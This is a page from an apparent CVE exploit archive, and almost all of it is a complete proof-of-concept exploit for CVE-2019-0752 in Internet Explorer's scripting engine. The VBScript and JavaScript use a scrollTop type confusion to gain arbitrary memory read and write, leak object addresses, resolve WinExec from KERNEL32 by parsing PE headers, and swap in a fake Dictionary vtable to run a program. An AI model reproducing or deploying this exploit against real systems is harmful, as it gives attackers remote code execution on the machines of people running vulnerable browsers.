4837 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-0752
README.md
Rendering markdown...
POC / exploit.html HTML
⬇ Raw GitHub ✕ Close 
<meta http-equiv="x-ua-compatible" content="IE=8.a">
<body>
<script language="javascript">
var d1 = document.createElement("d"+"iv");
d1.id = "container1";
d1.setAttribute("st"+"yle", "overflo"+"w:scr"+"oll; width: 10px; height: 9px");
var d2 = document.createElement("d"+"iv");
d2.id = "content1";
d2.setAttribute("st"+"yle", "width:5000000px; height:4987000px");
d2.innerHTML = "Content";
d1.appendChild(d2);
document.body.appendChild(d1);
</script>
<script language="JavaScript">

    function readString(addr, len)
    {
        var s, v;
        s = new String();
        var end = (len + 1) * 2 + addr;
        for(; addr < end; addr+=4)
        {
            v = readInt32(addr);
            s += String.fromCharCode(v & 0xff);
            s += String.fromCharCode((v / 0x100) & 0xff);
            s += String.fromCharCode((v / 0x10000) & 0xff);
            s += String.fromCharCode((v / 0x1000000) & 0xff);
        }

        if (s.charCodeAt(len) == 0) return s.substring(0,len);

        return "";
    }

    function peBase(addr)
    {
        for (addr &= 0xffff0000; addr > 0; addr -= 0x10000 )
        {
            if (readInt32(addr) == 0x00905a4d) {
               return addr;
            }
        }

        return 0;
    }

    function peModule(name, base)
    {
        var imTable= readInt32(base + 0x3c);
        var size= readInt32(base + imTable + 0x84);
        imTable = base + readInt32(base + imTable + 0x80);

        var en;
        var rName;
        for (var i = 0; i < size; i++ )
        {
            en = base + readInt32(imTable + i*0x14 + 0xc);
            rName = readString(en, name.length);

            if(rName == name)
            {
                en = base + readInt32(imTable + i*0x14 + 0x10);
                return peBase(readInt32( en + 4));
            }
        }

        return 0;
    }

    function peProc(name, base)
    {
        var exTable= readInt32(base + 0x3c);
        exTable = base + readInt32(base + exTable + 0x78);

        var size= readInt32(exTable + 0x18);
        var aFunc= base + readInt32(exTable + 0x1c);
        var aName= base + readInt32(exTable + 0x20);
        var aNameOd= base + readInt32(exTable + 0x24);

        var en;
        var i= 0;
        var rName;
        for (i = 0; i < size; i++) {
            en = base + readInt32(aName + i*4);
            rName = readString(en, name.length);
            if(rName == name)
            {
                en = readInt32(aNameOd + i*2) & 0xffff;
                return base + readInt32(aFunc + en * 4);
            }
        }

        return 0;
    }

    function k32Func(funcName, addr)
    {
        var fBase= peBase(addr);

        var k32Base = peModule("KERNEL32.dll", fBase);
        var pVf = peProc(funcName, k32Base);

        return pVf;
    }

</script>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
        Private mValue
        Public Property Let Value(v)
                mValue = v
        End Property
        Public Default Property Get P
                P = mValue                              
        End Property
End Class
Sub TriggerWrite(where, val)
        Dim v1
        Set v1 = document.getElementById("container1")
        v1.scrollTop = val             
        Dim c
        Set c = new MyClass
        c.Value = where
        Set v1.scrollTop = c
End Sub
Sub WriteInt32With3ByteZeroTrailer(addr, val)
        TriggerWrite addr    , (val) AND &hff
        TriggerWrite addr + 1, (val\&h100) AND &hff
        TriggerWrite addr + 2, (val\&h10000) AND &hff
        TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
        For i = 0 To Len(str) - 1
                TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
        Next
End Sub
Function ReadInt32(addr)
        WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
        ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
        Set ar1(gremlin + 1) = obj
        LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
        TriggerWrite addressOfGremlin, &h4003
        For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
                If Not IsEmpty(ar1(i)) Then
                        gremlin = i
                        Exit For
                End If
        Next

        If IsEmpty(gremlin) Then
                MsgBox "Could not find gremlin"
                Exit Sub
        End If

        For i = 0 To UBound(ar2)
                Set ar2(i) = CreateObject("Scripting.Dictionary")
        Next

        Set dict = ar2(UBound(ar2) / 2)
        addressOfDict = LeakAddressOfObject(dict)
        vtableOfDict = ReadInt32(addressOfDict)
        winExec = k32Func("WinExec", vtableofDict)

        dict.CompareMode = vbTextCompare
        dict.Add "Pastrami", "Great"
        dict.Exists "test"      

        pld = ReadInt32(addressOfDict + &h3c)
        fakePld = &h20202020
        For i = 0 To 3 - 1
                WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
        Next

        fakeVtable = &h28282828         
        For i = 0 To 21
                If i = 12 Then          
                        fptr = winExec
                Else
                        fptr = ReadInt32(vtableOfDict + 4 * i)
                End If
                WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
        Next

        fakeaddressOfDict = addressOfGremlin + &h1000

	WriteAsciiStringWith4ByteZeroTrailer fakeaddressOfDict, "((((             \..[                                       "
        WriteInt32With3ByteZeroTrailer fakeaddressOfDict + &h3c, fakePld
	WriteAsciiStringWith4ByteZeroTrailer fakeaddressOfDict + &h40, "\..\splwow64"
        WriteInt32With3ByteZeroTrailer addressOfGremlin + &h18, fakeaddressOfDict

        On Error Resume Next
        ar1(gremlin + 1).Exists "test"          

        For i = 1 To 3
                WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
                WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
        Next
        Erase Dict
        Erase ar2
End Sub
Exploit
</script>
</body>